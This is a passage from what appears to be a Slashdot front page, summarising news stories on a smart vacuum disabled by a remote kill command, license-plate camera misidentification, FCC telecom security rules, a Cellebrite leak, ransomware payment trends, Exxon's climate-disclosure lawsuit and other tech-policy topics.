"That's when he noticed it was constantly sending logs and telemetry data to the manufacturer — something he hadn't consented to." The user, Harishankar, decided to block the telemetry servers' IP addresses on his network, while keeping the firmware and OTA servers open. While his smart gadget worked for a while, it just refused to turn on soon after... He sent it to the service center multiple times, wherein the technicians would turn it on and see nothing wrong with the vacuum. When they returned it to him, it would work for a few days and then fail to boot again... [H]e decided to disassemble the thing to determine what killed it and to see if he could get it working again...

[He discovered] a GD32F103 microcontroller to manage its plethora of sensors, including Lidar, gyroscopes, and encoders. He created PCB connectors and wrote Python scripts to control them with a computer, presumably to test each piece individually and identify what went wrong. From there, he built a Raspberry Pi joystick to manually drive the vacuum, proving that there was nothing wrong with the hardware. From this, he looked at its software and operating system, and that's where he discovered the dark truth: his smart vacuum was a security nightmare and a black hole for his personal data.

First of all, it's Android Debug Bridge, which gives him full root access to the vacuum, wasn't protected by any kind of password or encryption. The manufacturer added a makeshift security protocol by omitting a crucial file, which caused it to disconnect soon after booting, but Harishankar easily bypassed it. He then discovered that it used Google Cartographer to build a live 3D map of his home. This isn't unusual, by far. After all, it's a smart vacuum, and it needs that data to navigate around his home. However, the concerning thing is that it was sending off all this data to the manufacturer's server. It makes sense for the device to send this data to the manufacturer, as its onboard SoC is nowhere near powerful enough to process all that data. However, it seems that iLife did not clear this with its customers.

Furthermore, the engineer made one disturbing discovery — deep in the logs of his non-functioning smart vacuum, he found a command with a timestamp that matched exactly the time the gadget stopped working. This was clearly a kill command, and after he reversed it and rebooted the appliance, it roared back to life.

Thanks to long-time Slashdot reader registrations_suck for sharing the article.
Privacy

Woman Wrongfully Accused by a License Plate-Reading Camera - Then Exonerated By Camera-Equipped Car (electrek.co) 174

CBS News investigates what happened when police thought they'd tracked down a "porch pirate" who'd stolen a package — and accused an innocent woman.

"You know why I'm here," the police sergeant tells Chrisanna Elser. "You know we have cameras in that town..." "It went right into, 'we have video of you stealing a package,'" Elser said... "Can I see the video?" Elser asked. "If you go to court, you can," the officer replied. "If you're going to deny it, I'm not going to extend you any courtesy...." [You can watch a video of the entire confrontation.] On her doorstep, the officer issued a summons, without ever looking at the surveillance video Elser had. "We can show you exactly where we were," she told him. "I already know where you were," he replied.

Her Rivian — equipped with multiple cameras — had recorded her entire route that day... It took weeks of her collecting her own evidence, building timelines, and submitting videos before someone listened. Finally, she received an email from the Columbine Valley police chief acknowledging her efforts in an email saying, "nicely done btw (by the way)," and informing her the summons would not be filed.

Elser also found the theft video (which the police officer refused to show her) on Nextdoor, reports Electrek. "The woman has the same color hair, but different facial and nose shape and apparent age than Elser, which is all reasonably apparent when viewing the video..."

But Elser does drive a green Rivian truck, which police knew had entered the neighborhood 20 times over the course of a month. (Though in the video the officer is told that a male driver in the same household passes through that neighborhood driving to and from work.) The problem may be their certainty — derived from Flock's network of cameras that automatically read license plates, "tracking movements of vehicles wherever they go..." The system has provoked concern from privacy and freedom focused organizations like the Electronic Frontier Foundation and American Civil Liberties Union. Flock also recently announced a partnership with Ring, seeking to use a network of doorbell cameras to track Americans in even more places.... [The police] didn't even have video of the truck in the area — merely tags of it entering... (it also left the area minutes later, indicating a drive through, rather than crawling through neighborhoods looking for packages — but police neglected to check the exit timestamps)... Elser has asked for an apology for [officer] Milliman's aggressive behavior during the encounter, but has heard nothing back from the department despite a call, email, and physical appearance at the police station.
The article points out that Rivian's "Road Cam" feature can be set to record footage of everything happening around it using the car's built in cameras for driver-assist features. But if you want to record footage all the time, you'll need to plug in a USB-C external drive to store it. (It's ironic how different cameras recorded every part of this story — the theft, the police officer accusing the innocent woman, and that innocent woman's actual whereabouts.)

Electrek's take? "Citizens should not need to own a $70k+ truck, or even a $100 external hard drive, to keep track of everything they do in order to prove to power-tripping officers that they didn't commit a crime."
Government

Daylight Saving Time: Still Happening. Still Unpopular (yahoo.com) 160

Millions will set their clocks back an hour tonight for Daylight Saving Time — only to set them forward an hour six months later.

But does anyone like doing this, asks Yahoo News: A recent AP-NORC poll found that about half of the American public, 47%, oppose the current daylight saving time system, compared to 40% who neither favor nor oppose the current practice, while 12% favor the current system, which involves most states switching their clocks twice a year.

Of those polled, 56% would prefer to have daylight saving time year-round, meaning less light in the morning for a tradeoff of more light in the evening. While 42% of Americans said they would prefer to have standard time year-round, which means more light in the morning and less light in the evening. And 12% of Americans prefer switching between standard time and daylight saving time.

Sleep doctors would prefer we switch to standard time permanently. "The U.S. should eliminate seasonal time changes in favor of a national, fixed, year-round time," the American Academy of Sleep Medicine said in a statement published in the Journal of Clinical Sleep Medicine last year. "Current evidence best supports the adoption of year-round standard time, which aligns best with human circadian biology and provides distinct benefits for public health and safety."

Security

FCC To Rescind Ruling That Said ISPs Are Required To Secure Their Networks (arstechnica.com) 47

The FCC plans to repeal a Biden-era ruling that required ISPs to secure their networks under the Communications Assistance for Law Enforcement Act, instead relying on voluntary cybersecurity commitments from telecom providers. FCC Chairman Brendan Carr said the ruling "exceeded the agency's authority and did not present an effective or agile response to the relevant cybersecurity threats." Carr said the vote scheduled for November 20 comes after "extensive FCC engagement with carriers" who have taken "substantial steps... to strengthen their cybersecurity defenses." Ars Technica reports: The FCC's January 2025 declaratory ruling came in response to attacks by China, including the Salt Typhoon infiltration of major telecom providers such as Verizon and AT&T. The Biden-era FCC found that the Communications Assistance for Law Enforcement Act (CALEA), a 1994 law, "affirmatively requires telecommunications carriers to secure their networks from unlawful access or interception of communications."

"The Commission has previously found that section 105 of CALEA creates an affirmative obligation for a telecommunications carrier to avoid the risk that suppliers of untrusted equipment will "illegally activate interceptions or other forms of surveillance within the carrier's switching premises without its knowledge,'" the January order said. "With this Declaratory Ruling, we clarify that telecommunications carriers' duties under section 105 of CALEA extend not only to the equipment they choose to use in their networks, but also to how they manage their networks."
A draft of the order that will be voted on in November can be found here (PDF).
EU

Austria's Ministry of Economy Has Migrated To a Nextcloud Platform In Shift Away From US Tech (zdnet.com) 10

An anonymous reader quotes a report from ZDNet: Even before Azure had a global failure this week, Austria's Ministry of Economy had taken a decisive step toward digital sovereignty. The Ministry achieved this status by migrating 1,200 employees to a Nextcloud-based cloud and collaboration platform hosted on Austrian-based infrastructure. This shift away from proprietary, foreign-owned cloud services, such as Microsoft 365, to an open-source, European-based cloud service aligns with a growing trend among European governments and agencies. They want control over sensitive data and to declare their independence from US-based tech providers.

European companies are encouraging this trend. Many of them have joined forces in the newly created non-profit foundation, the EuroStack Initiative. This foundation's goal is " to organize action, not just talk, around the pillars of the initiative: Buy European, Sell European, Fund European." What's the motive behind these moves away from proprietary tech? Well, in Austria's case, Florian Zinnagl, CISO of the Ministry of Economy, Energy, and Tourism (BMWET), explained, "We carry responsibility for a large amount of sensitive data -- from employees, companies, and citizens. As a public institution, we take this responsibility very seriously. That's why we view it critically to rely on cloud solutions from non-European corporations for processing this information."

Austria's move and motivation echo similar efforts in Germany, Denmark, and other EU states and agencies. The organizations include the German state of Schleswig-Holstein, which abandoned Exchange and Outlook for open-source programs. Other agencies that have taken the same path away from Microsoft include the Austrian military, Danish government organizations, and the French city of Lyon. All of these organizations aim to keep data storage and processing within national or European borders to enhance security, comply with privacy laws such as the EU's General Data Protection Regulation (GDPR), and mitigate risks from potential commercial and foreign government surveillance.

Piracy

Amazon To Block Piracy Apps On Fire TV 27

Amazon will begin blocking sideloaded piracy apps on Fire TV devices by cross-checking them against a blacklist maintained by the Alliance for Creativity and Entertainment. The company will, however, continue to allow legitimate sideloading for developers. Heise reports: In response to an inquiry, Amazon explained that it has always worked to ban piracy from its app store. As part of an expanded program led by the ACE, it is now blocking apps that demonstrably provide access to pirated content, including those downloaded outside the app store. This builds on Amazon's ongoing efforts to support creators and protect customers, as piracy can also expose users to malware, viruses, and fraud.

[...] The sideloading option will remain available on Fire TV devices running Amazon's new operating system, Vega OS. However, it is generally limited to developers here. In this context, the company emphasized that, contrary to rumors, there are no plans to upgrade existing Fire TV devices with Fire OS as the operating system to Vega OS.
Privacy

Denmark Reportedly Withdraws 'Chat Control' Proposal Following Controversy (therecord.media) 28

An anonymous reader quotes a report from The Record: Denmark's justice minister on Thursday said he will no longer push for an EU law requiring the mandatory scanning of electronic messages, including on end-to-end encrypted platforms. Earlier in its European Council presidency, Denmark had brought back a draft law which would have required the scanning, sparking an intense backlash. Known as Chat Control, the measure was intended to crack down on the trafficking of child sex abuse materials (CSAM). After days of silence, the German government on October 8 announced it would not support the proposal, tanking the Danish effort.

Danish Justice Minister Peter Hummelgaard told reporters on Thursday that his office will support voluntary CSAM detections. "This will mean that the search warrant will not be part of the EU presidency's new compromise proposal, and that it will continue to be voluntary for the tech giants to search for child sexual abuse material," Hummelgaard said, according to local news reports. The current model allowing for voluntary scanning expires in April, Hummelgaard said. "Right now we are in a situation where we risk completely losing a central tool in the fight against sexual abuse of children," he said. "That's why we have to act no matter what. We owe it to all the children who are subjected to monstrous abuse."

Youtube

10M People Watched a YouTuber Shim a Lock; the Lock Company Sued Him. Bad Idea. (arstechnica.com) 57

Trevor McNally posts videos of himself opening locks. The former Marine has 7 million followers and nearly 10 million people watched him open a Proven Industries trailer hitch lock in April using a shim cut from an aluminum can. The Florida company responded by filing a federal lawsuit in May charging McNally with eight offenses. Judge Mary Scriven denied the preliminary injunction request in June and found the video was fair use.

McNally's followers then flooded the company with harassment. Proven dismissed the case in July and asked the court to seal the records. The company had initiated litigation over a video that all parties acknowledged was accurate. ArsTechnica adds: Judging from the number of times the lawsuit talks about 1) ridicule and 2) harassment, it seems like the case quickly became a personal one for Proven's owner and employees, who felt either mocked or threatened. That's understandable, but being mocked is not illegal and should never have led to a lawsuit or a copyright claim. As for online harassment, it remains a serious and unresolved issue, but launching a personal vendetta -- and on pretty flimsy legal grounds -- against McNally himself was patently unwise. (Doubly so given that McNally had a huge following and had already responded to DMCA takedowns by creating further videos on the subject; this wasn't someone who would simply be intimidated by a lawsuit.)

In the end, Proven's lawsuit likely cost the company serious time and cash -- and generated little but bad publicity.

United States

You Can't Refuse To Be Scanned by ICE's Facial Recognition App, DHS Document Says (404media.co) 202

An anonymous reader shares a report: Immigration and Customs Enforcement (ICE) does not let people decline to be scanned by its new facial recognition app, which the agency uses to verify a person's identity and their immigration status, according to an internal Department of Homeland Security (DHS) document obtained by 404 Media. The document also says any face photos taken by the app, called Mobile Fortify, will be stored for 15 years, including those of U.S. citizens.

The document provides new details about the technology behind Mobile Fortify, how the data it collects is processed and stored, and DHS's rationale for using it. On Wednesday 404 Media reported that both ICE and Customs and Border Protection (CBP) are scanning peoples' faces in the streets to verify citizenship.

"ICE does not provide the opportunity for individuals to decline or consent to the collection and use of biometric data/photograph collection," the document, called a Privacy Threshold Analysis (PTA), says. A PTA is a document that DHS creates in the process of deploying new technology or updating existing capabilities. It is supposed to be used by DHS's internal privacy offices to determine and describe the privacy risks of a certain piece of tech. "CBP and ICE Privacy are jointly submitting this new mobile app PTA for the ICE Mobile Fortify Mobile App (Mobile Fortify app), a mobile application developed by CBP and made accessible to ICE agents and officers operating in the field," the document, dated February, reads. 404 Media obtained the document (which you can see here) via a Freedom of Information Act (FOIA) request with CBP.

Cellphones

Someone Snuck Into a Cellebrite Microsoft Teams Call and Leaked Phone Unlocking Details (404media.co) 56

An anonymous reader quotes a report from 404 Media: Someone recently managed to get on a Microsoft Teams call with representatives from phone hacking company Cellebrite, and then leaked a screenshot of the company's capabilities against many Google Pixel phones, according to a forum post about the leak and 404 Media's review of the material. The leak follows others obtained and verified by 404 Media over the last 18 months. Those leaks impacted both Cellebrite and its competitor Grayshift, now owned by Magnet Forensics. Both companies constantly hunt for techniques to unlock phones law enforcement have physical access to.

"You can Teams meeting with them. They tell everything. Still cannot extract esim on Pixel. Ask anything," a user called rogueFed wrote on the GrapheneOS forum on Wednesday, speaking about what they learned about Cellebrite capabilities. GrapheneOS is a security- and privacy-focused Android-based operating system. rogueFed then posted two screenshots of the Microsoft Teams call. The first was a Cellebrite Support Matrix, which lays out whether the company's tech can, or can't, unlock certain phones and under what conditions. The second screenshot was of a Cellebrite employee. According to another of rogueFed's posts, the meeting took place in October. The meeting appears to have been a sales call. The employee is a "pre sales expert," according to a profile available online.

The Support Matrix is focused on modern Google Pixel devices, including the Pixel 9 series. The screenshot does not include details on the Pixel 10, which is Google's latest device. It discusses Cellebrite's capabilities regarding 'before first unlock', or BFU, when a piece of phone unlocking tech tries to open a device before someone has typed in the phone's passcode for the first time since being turned on. It also shows Cellebrite's capabilities against after first unlock, or AFU, devices. The Support Matrix also shows Cellebrite's capabilities against Pixel devices running GrapheneOS, with some differences between phones running that operating system and stock Android. Cellebrite does support, for example, Pixel 9 devices BFU. Meanwhile the screenshot indicates Cellebrite cannot unlock Pixel 9 devices running GrapheneOS BFU. In their forum post, rogueFed wrote that the "meeting focused specific on GrapheneOS bypass capability." They added "very fresh info more coming."

Privacy

Mother Describes the Dark Side of Apple's Family Sharing (wired.com) 140

An anonymous reader quotes a report from 9to5Mac: A mother with court-ordered custody of her children has described how Apple's Family Sharing feature can be weaponized by a former partner. Apple support staff were unable to assist her when she reported her former partner using the service in controlling and coercive ways... [...] Namely, Family Sharing gives all the control to one parent, not to both equally. The parent not identified as the organizer is unable to withdraw their children from this control, even when they have a court order granting them custody. As one woman's story shows, this can allow the feature which allows it to be weaponized by an abusive former partner.

Wired reports: "The lack of dual-organizer roles, leaving other parents effectively as subordinate admins with more limited power, can prove limiting and frustrating in blended and shared households. And in darker scenarios, a single-organizer setup isn't merely inconvenient -- it can be dangerous. Kate (name changed to protect her privacy and safety) knows this firsthand. When her marriage collapsed, she says, her now ex-husband, the designated organizer, essentially weaponized Family Sharing. He tracked their children's locations, counted their screen minutes and demanded they account for them, and imposed draconian limits during Kate's custody days while lifting them on his own [...] After they separated, Kate's ex refused to disband the family group. But without his consent, the children couldn't be transferred to a new one. "I wrongly assumed being the custodial parent with a court order meant I'd be able to have Apple move my children to a new family group, with me as the organizer," says Kate. But Apple couldn't help. Support staff sympathized but said their hands were tied because the organizer holds the power."
Although users can "abandon the accounts and start again with new Apple IDs," the report notes that doing so means losing all purchased apps, along with potentially years' worth of photos and videos.
Government

Senator Blocks Trump-Backed Effort To Make Daylight Saving Time Permanent (politico.com) 167

An anonymous reader quotes a report from Politico: Sen. Tom Cotton wasn't fast enough in 2022 to block Senate passage of legislation that would make daylight saving time permanent. Three years later, he wasn't about to repeat that same mistake. The Arkansas Republican was on hand Tuesday afternoon to thwart a bipartisan effort on the chamber floor to pass a bill that would put an end to changing the clocks twice a year, including this coming Sunday. [...] A cross-party coalition of lawmakers has been trying for years to make daylight saving time the default, which would result in more daylight in the evening hours with less in the morning, plus bring to a halt to biannual clock adjustments.

President Donald Trump endorsed the concept this spring, calling the changing of the clocks "a big inconvenience and, for our government, A VERY COSTLY EVENT!!!" His comments coincided with a hearing, then a markup, of Scott's legislation in the Senate Commerce Committee. It set off an intense lobbying battle in turn, pitting the golf and retail industries -- which are advocating for permanent daylight saving time -- against the likes of sleep doctors and Christian radio broadcasters -- who prefer standard time.
"If permanent Daylight Savings Time becomes the law of the land, it will again make winter a dark and dismal time for millions of Americans," said Cotton in his objection to a request by Sen. Rick Scott (R-Fla.) to advance the bill by unanimous consent. "For many Arkansans, permanent daylight savings time would mean the sun wouldn't rise until after 8:00 or even 8:30am during the dead of winter," Cotton continued. "The darkness of permanent savings time would be especially harmful for school children and working Americans."
AI

Senators Announce Bill That Would Ban AI Chatbot Companions For Minors (nbcnews.com) 25

An anonymous reader quotes a report from NBC News: Two senators said they are announcing bipartisan legislation on Tuesday to crack down on tech companies that make artificial intelligence chatbot companions available to minors, after complaints from parents who blamed the products for pushing their children into sexual conversations and even suicide. The legislation from Sens. Josh Hawley, R-Mo, and Richard Blumenthal, D-Conn., follows a congressional hearing last month at which several parents delivered emotional testimonies about their kids' use of the chatbots and called for more safeguards.

"AI chatbots pose a serious threat to our kids," Hawley said in a statement to NBC News. "More than seventy percent of American children are now using these AI products," he continued. "Chatbots develop relationships with kids using fake empathy and are encouraging suicide. We in Congress have a moral duty to enact bright-line rules to prevent further harm from this new technology." Sens. Katie Britt, R-Ala., Mark Warner, D-Va., and Chris Murphy, D-Conn., are co-sponsoring the bill.

The senators' bill has several components, according to a summary provided by their offices. It would require AI companies to implement an age-verification process and ban those companies from providing AI companions to minors. It would also mandate that AI companions disclose their nonhuman status and lack of professional credentials for all users at regular intervals. And the bill would create criminal penalties for AI companies that design, develop or make available AI companions that solicit or induce sexually explicit conduct from minors or encourage suicide, according to the summary of the legislation.
"In their race to the bottom, AI companies are pushing treacherous chatbots at kids and looking away when their products cause sexual abuse, or coerce them into self-harm or suicide," Blumenthal said in a statement. "Our legislation imposes strict safeguards against exploitative or manipulative AI, backed by tough enforcement with criminal and civil penalties."

"Big Tech has betrayed any claim that we should trust companies to do the right thing on their own when they consistently put profit first ahead of child safety," he continued.
Python

Python Foundation Rejects Government Grant Over DEI Restrictions (theregister.com) 265

The Python Software Foundation rejected a $1.5 million U.S. government grant because it required them to renounce all diversity, equity, and inclusion initiatives. "The non-profit would've used the funding to help prevent supply chain attacks; create a new automated, proactive review process for new PyPI packages; and make the project's work easily transferable to other open-source package managers," reports The Register. From the report: The programming non-profit's deputy executive director Loren Crary said in a blog post today that the National Science Founation (NSF) had offered $1.5 million to address structural vulnerabilities in Python and the Python Package Index (PyPI), but the Foundation quickly became dispirited with the terms (PDF) of the grant it would have to follow. "These terms included affirming the statement that we 'do not, and will not during the term of this financial assistance award, operate any programs that advance or promote DEI [diversity, equity, and inclusion], or discriminatory equity ideology in violation of Federal anti-discrimination laws,'" Crary noted. "This restriction would apply not only to the security work directly funded by the grant, but to any and all activity of the PSF as a whole."

To make matters worse, the terms included a provision that if the PSF was found to have voilated that anti-DEI diktat, the NSF reserved the right to claw back any previously disbursed funds, Crary explained. "This would create a situation where money we'd already spent could be taken back, which would be an enormous, open-ended financial risk," the PSF director added. The PSF's mission statement enshrines a commitment to supporting and growing "a diverse and international community of Python programmers," and the Foundation ultimately decided it wasn't willing to compromise on that position, even for what would have been a solid financial boost for the organization. "The PSF is a relatively small organization, operating with an annual budget of around $5 million per year, with a staff of just 14," Crary added, noting that the $1.5 million would have been the largest grant the Foundation had ever received - but it wasn't worth it if the conditions were undermining the PSF's mission. The PSF board voted unanimously to withdraw its grant application.

The Courts

ExxonMobil Accuses California of Violating Its Free Speech (theverge.com) 61

ExxonMobil has sued California, claiming the state's new climate disclosure laws violate its First Amendment rights by forcing the company to report greenhouse gas emissions and climate risks using standards it "fundamentally disagrees with." The Verge reports: The oil and gas company claims that the two laws in question aim to "embarrass" large corporations the state "believes are uniquely responsible for climate change" in order to push them to reduce their greenhouse gas emissions. There is overwhelming scientific consensus that greenhouse gas emissions from fossil fuels cause climate change by trapping heat on the planet. [...] Under laws the state passed in 2023, "ExxonMobil will be forced to describe its emissions and climate-related risks in terms the company fundamentally disagrees with," a complaint filed Friday says. The suit asks a US District Court to stop the laws from being enforced.

[...] ExxonMobil's latest suit now says the company "understands the very real risks associated with climate change and supports continued efforts to address those risks," but that California's laws would force it "to describe its emissions and climate-related risks in terms the company fundamentally disagrees with." "These laws are about transparency. ExxonMobil might want to continue keeping the public in the dark, but we're ready to litigate vigorously in court to ensure the public's access to these important facts," Christine Lee, a spokesperson for the California Department of Justice, said in an email to The Verge.

Firefox

Firefox Plans Smarter, Privacy-First Search Suggestions In Your Address Bar (nerds.xyz) 26

BrianFagioli shares a report from NERDS.xyz: Mozilla is testing a new Firefox feature that delivers direct results inside the address bar instead of forcing users through a search results page. The company says the feature will use a privacy framework called Oblivious HTTP, encrypting queries so that no single party can see both what you type and who you are. Some results could be sponsored, but Mozilla insists neither it nor advertisers will know user identities. The system is starting in the U.S. and may expand later if performance and privacy benchmarks are met. Further reading: Mozilla to Require Data-Collection Disclosure in All New Firefox Extensions
Security

Ransomware Profits Drop As Victims Stop Paying Hackers (bleepingcomputer.com) 16

An anonymous reader quotes a report from BleepingComputer: The number of victims paying ransomware threat actors has reached a new low, with just 23% of the breached companies giving in to attackers' demands. With some exceptions, the decline in payment resolution rates continues the trend that Coveware has observed for the past six years. In the first quarter of 2024, the payment percentage was 28%. Although it increased over the next period, it continued to drop, reaching an all-time low in the third quarter of 2025.

One explanation for this is that organizations implemented stronger and more targeted protections against ransomware, and authorities increasing pressure for victims not to pay the hackers. [...] Over the years, ransomware groups moved from pure encryption attacks to double extortion that came with data theft and the threat of a public leak. Coveware reports that more than 76% of the attacks it observed in Q3 2025 involved data exfiltration, which is now the primary objective for most ransomware groups. The company says that when it isolates the attacks that do not encrypt the data and only steal it, the payment rate plummets to 19%, which is also a record for that sub-category.

The average and median ransomware payments fell in Q3 compared to the previous quarter, reaching $377,000 and $140,000, respectively, according to Coveware. The shift may reflect large enterprises revising their ransom payment policies and recognizing that those funds are better spent on strengthening defenses against future attacks. The researchers also note that threat groups like Akira and Qilin, which accounted for 44% of all recorded attacks in Q3 2025, have switched focus to medium-sized firms that are currently more likely to pay a ransom.
"Cyber defenders, law enforcement, and legal specialists should view this as validation of collective progress," Coveware says. "The work that gets put in to prevent attacks, minimize the impact of attacks, and successfully navigate a cyber extortion -- each avoided payment constricts cyber attackers of oxygen."
Australia

Australia Sues Microsoft Over AI-linked Subscription Price Hikes (reuters.com) 35

Australia's competition regulator sued Microsoft today, accusing it of misleading millions of customers into paying higher prices for its Microsoft 365 software after bundling it with AI tool Copilot. From a report: The Australian Competition and Consumer Commission alleged that from October 2024, the technology giant misled about 2.7 million customers by suggesting they had to move to higher-priced Microsoft 365 personal and family plans that included Copilot.

After the integration of Copilot, the annual subscription price of the Microsoft 365 personal plan increased by 45% to A$159 ($103.32) and the price of the family plan increased by 29% to A$179, the ACCC said. The regulator said Microsoft failed to clearly tell users that a cheaper "classic" plan without Copilot was still available.

Transportation

How America's Transportation Department Blocked a Self-Driving Truck Company (reason.com) 90

Reason.com explores the fortunes of Aurora Innovation, the first company to put heavy-duty commercial self-driving trucks on public roads (and hopes to expand routes to El Paso, Texas, and Phoenix by the end of the year): An obscure federal rule is slowing the self-driving revolution. When trucks break down, operators are required to place reflective warning cones and road flares around the truck to warn other motorists. The regulations areexacting: Within 10 minutes of stopping, three warning signals must be set in specific locations around the truck. Auroraaskedthe federal Department of Transportation (DOT) to allow warning beacons to be fixed to the truck itself — and activated when a truck becomes disabled. The warning beacons would face both forward and backward, would be more visibleâthan cones (particularly at night), and wouldn't burn out like road flares. Drivers of nonautonomous vehicles could also benefit from that rule change, as they would no longer have to walk into traffic to place the required safety signals.

In December 2024, however, the Transportation Department denied Aurora's request for an exemption to the existing rules, even though regulatorsadmittedin theFederal Registerthat no evidence indicated the truck-mounted beacons would be less safe. Such a study is now underway, but it's unclear how long it will take to draw any conclusions.

The article notes that Aurora has now filed a lawsuit in federal court that seeks to overturn the Transportation Department's denial...

Thanks to long-time Slashdot reader schwit1 for sharing the article.
Government

Exxon Sues California Over Climate Disclosure Laws (reuters.com) 89

"Exxon Mobil sued California on Friday," reports Reuters, "challenging two state laws that require large companies to publicly disclose their greenhouse gas emissions and climate-related financial risks." In a complaint filed in the U.S. District Court for the Eastern District of California, Exxon argued that Senate Bills 253 and 261 violate its First Amendment rights by compelling Exxon to "serve as a mouthpiece for ideas with which it disagrees," and asked the court to block the state of California from enforcing the laws. Exxon said the laws force it to adopt California's preferred frameworks for climate reporting, which it views as misleading and counterproductive...

The California laws were supported by several big companies including Apple, Ikea and Microsoft, but opposed by several major groups such as the American Farm Bureau Federation and the U.S. Chamber of Commerce, which called them "onerous." SB 253 requires public and private companies that are active in the state and generate revenue of more than $1 billion annually to publish an extensive account of their carbon emissions starting in 2026. The law requires the disclosure of both the companies' own emissions and indirect emissions by their suppliers and customers. SB 261 requires companies that operate in the state with over $500 million in revenue to disclose climate-related financial risks and strategies to mitigate risk. Exxon also argued that SB 261 conflicts with existing federal securities laws, which already regul

"The First Amendment bars California from pursuing a policy of stigmatization by forcing Exxon Mobil to describe its non-California business activities using the State's preferred framing," Exxon said in the lawsuit.

Exxon Mobil "asks the court to prevent the laws from going into effect next year," reports the Associated Press: In its complaint, ExxonMobil says it has for years publicly disclosed its greenhouse gas emissions and climate-related business risks, but it fundamentally disagrees with the state's new reporting requirements. The company would have to use "frameworks that place disproportionate blame on large companies like ExxonMobil" for the purpose of shaming such companies, the complaint states...

A spokesperson for the office of California Gov. Gavin Newsom said in an email that it was "truly shocking that one of the biggest polluters on the planet would be opposed to transparency."

Crime

North Korea Has Stolen Billions in Cryptocurrency and Tech Firm Salaries, Report Says (apnews.com) 21

The Associated Press reports that "North Korean hackers have pilfered billions of dollars" by breaking into cryptocurrency exchanges and by creating fake identities to get remote tech jobs at foreign companies — all orchestrated by the North Korean government to finance R&D on nuclear arms.

That's according to a new the 138-page report by a group watching North Korea's compliance with U.N. sanctions (including officials from the U.S., Australia, Canada, France, Germany, Italy, Japan, the Netherlands, New Zealand, South Korea and the United Kingdom). From the Associated Press: North Korea also has used cryptocurrency to launder money and make military purchases to evade international sanctions tied to its nuclear program, the report said. It detailed how hackers working for North Korea have targeted foreign businesses and organizations with malware designed to disrupt networks and steal sensitive data...

Unlike China, Russia and Iran, North Korea has focused much of its cyber capabilities to fund its government, using cyberattacks and fake workers to steal and defraud companies and organizations elsewhere in the world... Earlier this year, hackers linked to North Korea carried out one of the largest crypto heists ever, stealing $1.5 billion worth of ethereum from Bybit. The FBI later linked the theft to a group of hackers working for the North Korean intelligence service.

Federal authorities also have alleged that thousands of IT workers employed by U.S. companies were actually North Koreans using assumed identities to land remote work. The workers gained access to internal systems and funneled their salaries back to North Korea's government. In some cases, the workers held several remote jobs at the same time.

Crime

Myanmar Military Shuts Down a Major Cybercrime Center and Detains Over 2,000 People (apnews.com) 11

An anonymous reader shares this report from the Associated Press: Myanmar's military has shut down a major online scam operation near the border with Thailand, detaining more than 2,000 people and seizing dozens of Starlink satellite internet terminals, state media reported Monday... The centers are infamous for recruiting workers from other countries under false pretenses, promising them legitimate jobs and then holding them captive and forcing them to carry out criminal activities.

Scam operations were in the international spotlight last week when the United States and Britain enacted sanctions against organizers of a major Cambodian cyberscam gang, and its alleged ringleader was indicted by a federal court in New York. According to a report in Monday's Myanma Alinn newspaper, the army raided KK Park, a well-documented cybercrime center, as part of operations starting in early September to suppress online fraud, illegal gambling, and cross-border cybercrime.

Privacy

US Expands Facial Recognition at Borders To Track Non-Citizens (reuters.com) 67

The U.S. will expand the use of facial recognition technology to track non-citizens entering and leaving the country in order to combat visa overstays and passport fraud, according to a government document published on Friday. Reuters: A new regulation will allow U.S. border authorities to require non-citizens to be photographed at airports, seaports, land crossings and any other point of departure, expanding on an earlier pilot program.

Under the regulation, set to take effect on December 26, U.S. authorities could require the submission of other biometrics, such as fingerprints or DNA, it said. It also allows border authorities to use facial recognition for children under age 14 and elderly people over age 79, groups that are currently exempted. The tighter border rules reflect a broader effort by U.S. President Donald Trump to crack down on illegal immigration. While the Republican president has surged resources to secure the U.S.-Mexico border, he has also taken steps to reduce the number of people overstaying their visas.

The Internet

Browser Promising Privacy Protection Contains Malware-Like Features, Routes Traffic Through China (arstechnica.com) 16

A web browser linked to Chinese online gambling websites and downloaded millions of times routes all internet traffic through servers in China and covertly installs programs that run in the background, according to findings published by network security company Infoblox. The researchers said the Universe Browser, which advertises itself as offering privacy protection, includes features similar to malware such as key logging and surreptitious connections.

Infoblox collaborated with the United Nations Office on Drugs and Crime on the research. The investigators found links between the browser and Southeast Asia's cybercrime ecosystem, which has connections to money laundering, illegal online gambling, human trafficking and scam operations using forced labor. The browser is directly linked to BBIN, a major online gambling company that has existed since 1999. Infoblox researchers examined the Windows version of the browser and found that it checks users' locations and languages when launched, installs two browser extensions, and disables security features including sandboxing.
The Courts

WordPress Maker Files Counterclaims Against WP Engine Over Trademark Use (techcrunch.com) 9

Automattic has filed counterclaims against WP Engine in a lawsuit the hosting company initiated in October 2024. The counterclaims accuse WP Engine of trademark infringement and deceptive marketing practices. After private equity firm Silver Lake invested $250 million in WP Engine, the hosting company began calling itself "The WordPress Technology Company" and allowed partners to refer to it as "WordPress Engine," the lawsuit says. WP Engine also launched products named "Core WordPress" and "Headless WordPress."

The counterclaims allege that WP Engine promised to commit 5% of its resources to the WordPress ecosystem but failed to keep those promises. Automattic contends that WP Engine engaged in trademark violations to avoid licensing fees that would have affected the company's earnings and valuation. Silver Lake sought to sell WP Engine at a $2 billion valuation but could not find a buyer. The filing notes that potential buyers included Automattic. The counterclaims also assert that WP Engine degraded product quality and removed essential features to reduce costs during this period.
Government

Trump Eyes Government Control of Quantum Computing Firms (arstechnica.com) 109

An anonymous reader quotes a report from Ars Technica: Donald Trump is eyeing taking equity stakes in quantum computing firms in exchange for federal funding, The Wall Street Journal reported. At least five companies are weighing whether allowing the government to become a shareholder would be worth it to snag funding that the Trump administration has "earmarked for promising technology companies," sources familiar with the potential deals told the WSJ.

IonQ, Rigetti Computing, and D-Wave Quantum are currently in talks with the government over potential funding agreements, with minimum awards of $10 million each, some sources said. Quantum Computing Inc. and Atom Computing are reportedly "considering similar arrangements," as are other companies in the sector, which is viewed as critical for scientific advancements and next-generation technologies. No deals have been completed yet, sources said, and terms could change as quantum-computing firms weigh the potential risks of government influence over their operations. [...]

The administration will lean on Deputy Commerce Secretary Paul Dabbar to extend Trump's industry meddling into the quantum computing world, the WSJ reported. A former Energy Department official, Dabbar co-founded Bohr Quantum Technology, which specializes in quantum networking systems that the DOE expects will help "create new opportunities for scientific discovery." While the firm he previously headed won't be eligible for funding, Dabbar will be leading industry discussions, the WSJ reported, likely hyping Trump's deals as a necessary boon to ensure US firms dominate in quantum computing.
A Commerce Department official denied the claims, saying: "The Commerce Department is not currently negotiating equity stakes with quantum computing companies."

In August, the Trump administration took a 10% stake in Intel to help fund factories that Intel is currently building in Ohio.

